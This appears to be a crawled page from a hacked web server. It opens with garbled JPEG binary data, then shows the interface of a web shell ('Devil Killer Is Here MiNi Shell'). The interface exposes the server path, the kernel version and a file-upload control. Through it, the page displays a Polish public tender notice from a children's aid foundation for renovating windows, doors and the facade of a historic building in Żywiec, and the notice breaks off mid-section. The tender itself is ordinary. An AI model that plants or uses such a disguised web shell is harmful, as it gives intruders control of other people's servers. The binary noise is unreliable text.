JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250515/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250515/0023259101-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Wymiana stolarki okiennej i drzwiowej oraz remont elewacji w zabytkowym budynku Fundacji Pomocy Dzieciom, zlokalizowanym <br/> w Żywcu przy ul. Wincentego Witosa 3” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">FUNDACJA POMOCY DZIECIOM</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 070909374</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wincentego Witosa 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Żywiec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL225 - Bielski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">338602513</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">fundacjapm@go2.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.fundacjazywiec.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> działalność organizacji pożytku publicznego </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Wymiana stolarki okiennej i drzwiowej oraz remont elewacji w zabytkowym budynku Fundacji Pomocy Dzieciom, zlokalizowanym <br/> w Żywcu przy ul. Wincentego Witosa 3” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-323bf3c5-d1ae-4c0d-9a4e-d1645b4fd948</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00232591</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-323bf3c5-d1ae-4c0d-9a4e-d1645b4fd948 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia publicznego komunikacja między<br/>Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy użyciu Platformy e-Zamówienia lub poczty elektronicznej<br/>fundacjapm@go2.pl, z zastrzeżeniem, że oferta musi być przekazana wyłącznie za pomocą Platformy e- Zamówienia.<br/>Adres strony internetowej prowadzonego postępowania https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych, zwane dalej<br/>„RODO”) (Dz. U. UE. L. 119.1 z 04.05.2016) informuję, iż:<br/>Administratorem danych osobowych jest Fundacja Pomocy Dzieciom z siedzibą w Żywcu 34-300, przy ul. Witosa 3, tel. 33 860 25<br/>13, www.fundacjazywiec.pl, e-mail: fundacjapm@go2.pl</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">03/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest kompleksowy remont stolarki okiennej i drzwiowej oraz elewacji w zabytkowym budynku należącym do Fundacji Pomocy Dzieciom, tzw. „Kościarni”, położonym na terenie zabytkowego zespołu zamkowo – parkowego Habsburgów w Żywcu, przy ul. Wincentego Witosa 3, który obejmuje: <br/>•	Całkowitą wymianę stolarki okiennej, drzwi zewnętrznych i ościeżnic, montaż parapetów wewnętrznych i obróbki tynkarskie wewnętrzne,<br/> oraz<br/>•	remont elewacji – uzupełnienie tynków po wymianie okien i drzwi, całościowe odnowienie elewacji, odtworzenie brakujących ozdobnych elementów na elewacjach wokół okien i drzwi, zgodnie z zatwierdzoną kolorystyką.<br/>•	Montaż szklanego zadaszenia nad wejściem głównym, <br/>6)	Wykaz czynności do wykonania: <br/><br/>a)	CZYNNOŚCI OGÓLNE;<br/>Czynności administracyjne, w tym wykonanie warunków i obowiązków wynikających z decyzji i pozwoleń wydanych przez Wojewódzkiego Konserwatora Zabytków nr BB/166/2024 oraz Starosty Żywieckiego nr 305/2024, w szczególności zawiadomienie WKZ o rozpoczęciu robót przy zabytku, jak również wskazanie osób nadzorujących kierujących pracami przy zabytku.<br/><br/>b)	CZYNNOŚCI OGÓLNOBUDOWLANE;<br/>-Zabezpieczenie dostępu do miejsca prowadzonych prac dla osób postronnych, wywieszenie tablic informacyjnych i ostrzegawczych.<br/>-	Wykonanie daszków zabezpieczających nad wejściami do budynku, <br/>-	Postawienie rusztowania zabezpieczonego siatką ochronną, <br/>-	Sprawdzenie uprawnień osób i firm prowadzących przedmiotowe roboty, instruktaż BHP dla pracowników. <br/><br/>c)	WYMIANA STOLARKI OKIENNEJ i DRZWIOWEJ.<br/>Wymiana starej, wtórnej stolarki okiennej i drzwiowej - na nową stolarkę drewnianą, zespoloną w kolorze ciemny brąz (z utrzymaniem pierwotnych podziałów-szprosy) obejmie:<br/>-	wykucie z muru istniejących, starych ościeżnic, w tym wykucie otworów o zmienionej lub przesuniętej powierzchni i analogicznie uzupełnienie ścian / zamurowanie otworów, wyrównanie nierówności, uzupełnienie tynków wewnętrznych;<br/>-	montaż nadproży (wykonanie przesklepień otworów w ścianach, z wykuciem bruzd dla belek, montaż belek stalowych, obróbki tynkarskie, uzupełnienie tynków);<br/>-	wymiana stolarki okiennej i drzwiowej na elewacji (okna drewniane, trzyszybowe, współczynnik przenikania ciepła 0,9 [W/(m2*K), drzwi drewniane współczynnik przenikania ciepła 1,3 [W/(m2*K)];<br/>-	wymiana stolarki okiennej w dachu – okna drewniane współczynnik przenikania ciepła 0,9 [W/(m2*K); z uwzględnieniem zdemontowania istniejących rolet i zamontowania ich powtórnie na nowych oknach. <br/>-	wymiana stolarki okiennej połaciowej: okna połaciowe z podwójną osią obrotu i systemowymi roletami, właz dachowy oszklony szkłem przeciwgradowym, ocieplony - współczynnik przenikania ciepła 1,1 [W/(m2*K); <br/>-	montaż parapetów wewnętrznych i wykończenia wokół okien (tynki i malowanie wewnętrznych) obejmujące wykucie podokienników drewnianych, stalowych, osadzanie parapetów drewnianych, wykonanie okładzin z płyt gipsowych, wodoodpornych, tynkowanie, gruntowanie, malowanie;<br/>-	Wywóz gruzu i starych okien. <br/>-	Kolory stolarki okiennej i drzwiowej – ciemny brąz. <br/>Uwaga bardzo ważne!!! Przed zamówieniem konieczne będzie przedłożenie próbek kolorystycznych okien, szprosów, klamek drzwiowych i okiennych w celu uzyskania akceptacji Inwestora i Projektanta.<br/><br/>d) REMONT ELEWACJI.<br/>-	Montaż rusztowań oraz osłon z siatki ochronnej, zabezpieczenie okien folią polietylenową; <br/>-	Roboty demontażowe i rozbiórkowe - rozebranie rur spustowych (rury do ponownego zawieszenia), odbicie tynków, wywóz gruzu;<br/>-	Wykonanie i montaż parapetów zewnętrznych z blachy z cynku, pasów nadrynnowych (szer. ponad 25 cm, tytan cynk patyna, w kolorze ciemny brąz), obróbko blacharskie;<br/>-	Uzupełnienie i przemurowania ścian zaprawą cementowo – wapniową; <br/>-	Renowacja i odtworzenie ozdobnych elementów na elewacjach wokół okien i drzwi. <br/>-	Prace murarskie, tynkarskie – czyszczenie strumieniowo – ścierne powierzchni skutych, gruntowanie ścian, ręczne kładzenie podkładowych tynków renowacyjnych;<br/>-	Wykonanie obróbek elewacyjnych z blachy z cynku, pasów nadrynnowych, o szer. 25 cm; <br/>-	Malowanie elewacji, obejmujące gruntowanie 1 – stronne, malowanie farbą elewacyjną, dwukrotne;<br/>-	Ponowny montaż ściągniętych wcześniej rur spustowych;<br/>-	Naprawa zwodów instalacji odgromowych na elewacjach;<br/>-	Wykonanie zadaszenia nad wejściem głównym: zadaszenie szklane s-systemowe ze szkła hartowanego podwieszone do stalowej, ocynkowanej i malowanej proszkowo konstrukcji ramowej, na sztywnych cięgnach zakotwionych do murowanej konstrukcji ściany zewnętrznej. <br/>-	Kolory elewacji: (wg schematu jak na rysunku z palety NCS, RAL) <br/>Wypukłe elementy zdobnicze – NCS S 1005-G80Y <br/>Kolor główny – NCS S 2010-G80Y <br/>Cokół – NCS S 2005-Y10R <br/>Uwaga bardzo ważne!!! Przed zamówieniem farby konieczne będzie wykonanie próby kolorystycznej na elewacji o pow. ok. 1m2 i uzyskanie akceptacji Konserwatora, Inwestora i Projektanta.<br/><br/>e)	DOSTAWA I MONTAŻ ZADASZENIA SZKLANEGO NAD WEJŚCIEM GŁÓWNYM<br/>-	Wykonanie zadaszenia szklanego nad wejściem głównym zgodnie z projektem, tj. zadaszenie ze szkła hartowanego na konstrukcji stalowej, wg kalkulacji własnej określonej przez Wykonawcę. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45262110-5 - Demontaż rusztowań</p> <p class="mb-0">45262120-8 - Wznoszenie rusztowań</p> <p class="mb-0">45421100-5 - Instalowanie drzwi i okien, i podobnych elementów</p> <p class="mb-0">45421110-8 - Instalowanie ram drzwiowych i okiennych</p> <p class="mb-0">45421111-5 - Instalowanie framug drzwiowych</p> <p class="mb-0">45421112-2 - Instalowanie ram okiennych</p> <p class="mb-0">45421130-4 - Instalowanie drzwi i okien</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45262521-9 - Roboty murarskie w zakresie fasad</p> <p class="mb-0">45262522-6 - Roboty murarskie</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45442110-1 - Malowanie budynków</p> <p class="mb-0">45443000-4 - Roboty elewacyjne</p> <p class="mb-0">45111220-6 - Roboty w zakresie usuwania gruzu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami:<br/>Kryterium cena (C): 80%<br/>Termin gwarancji (G): 20%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu, w tym:<br/>a)	Posiadają zdolności do występowania w obrocie gospodarczym - Zamawiający nie formułuje szczegółowych wymogów w tym zakresie.<br/>b)	Posiadają uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej - Zamawiający nie formułuje szczegółowych wymogów w tym zakresie.<br/>c)	Posiadają sytuację ekonomiczną lub finansową wystarczającą na zrealizowanie zamówienia - Zamawiający nie formułuje szczegółowych wymogów w tym zakresie.<br/>d)	Posiadają zdolność techniczną lub zawodową, a w szczególności <br/> Wykonawca zobowiązany jest wykazać, że:<br/>•	spełnia wymagania, o których mowa w ustawie w art. 37c, 37g, 37g ustawy o ochronie zabytków i opiece nad zabytkami,<br/>•	w zakresie realizowanych robót wykonał minimum trzy różne roboty budowlane:<br/>-	posiada niezbędne doświadczenie, tzn.: - w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał w sposób należyty co najmniej 2 tożsame roboty budowlane polegające na realizacji podobnych prac, jak ta będąca przedmiotem niniejszego zamówienia.<br/>-	dysponuje potencjałem osób skierowanych do realizacji zamówienia, <br/> Ponadto: <br/>a) Zamawiający wymaga, aby Wykonawca przed złożeniem oferty odbył wizję lokalną miejsca realizacji zamówienia, zgodnie z art. 131 ust. 2 ustawy Prawo zamówień publicznych.<br/>b) Wizja lokalna ma charakter obowiązkowy. Brak jej odbycia skutkować będzie odrzuceniem oferty na podstawie art. 226 ust. 1 pkt 18 ustawy PZP.<br/>c) Termin wizji lokalnej ustala się na dzień 22 maja 2025r. w godz. od 8.00 do 14.00. Wykonawca zobowiązany jest do wcześniejszego kontaktu telefonicznego z przedstawicielem Zamawiającego .<br/><br/>Szczegółowy opis zawarty jest w SWZ II. WYMAGANIA STAWIANE WYKONAWCOM pkt. 6. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">b)	w zakresie braku podstaw wykluczenia:<br/>•	oświadczenie Wykonawcy / Wykonawców wspólnie ubiegających się o zamówienie / Podwykonawcy w zakresie braku podstaw wykluczenia z postępowania wskazanych przez zamawiającego (załącznik nr 3 do SWZ) <br/>•	oświadczeni o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t. j. Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej (Załącznik nr 5 do SWZ)</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">•	wykaz robót wykonanych w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te usługi roboty wykonane należycie, jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty (wzór wykazu stanowi Załącznik nr 7 do SWZ);<br/>•	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (wzór wykazu stanowi Załącznik nr 6 do SWZ)<br/>Uwaga: <br/>*dowodami, o których mowa powyżej mogą być referencje, protokoły odbioru bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane; z tym, że w odniesieniu do nadal wykonywanych robót dowody te powinny być wydane w okresie ostatnich 3 miesięcy <br/>* dowodami w przypadku uprawnień osób kierowanych do wykonania zamówienia muszą to być dokumenty wynikające z prawa budowalnego oraz wydane zgodnie z ustawą o ochronie zabytków i opiece nad zabytkami,</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> •	wykaz materiałów - w przypadku zaproponowania przez Wykonawcę materiałów lub rozwiązań „równoważnych”, Zamawiający wymaga przedstawienia przez Wykonawcę odpowiednich przedmiotowych środków dowodowych potwierdzających, że oferowane materiały lub rozwiązania spełniają wszystkie wymagania w zakresie parametrów technicznych, wydajności oraz funkcjonalności określone w dokumentacji projektowej. Jako środki dowodowe mogą być przedłożone w szczególności: normy, aprobaty techniczne, specyfikacje techniczne lub inne dokumenty odniesienia.<br/>Ocena równoważności zaoferowanych materiałów lub rozwiązań zostanie dokonana przez Projektanta oraz Inwestora i będzie wymagała ich akceptacji (załącznik nr 8 do SWZ). <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wymagania zostały szczegółowo opisane w SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Informacja dotycząca zmiany w umowie została określona w Załączniku nr 12 - projekt umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania 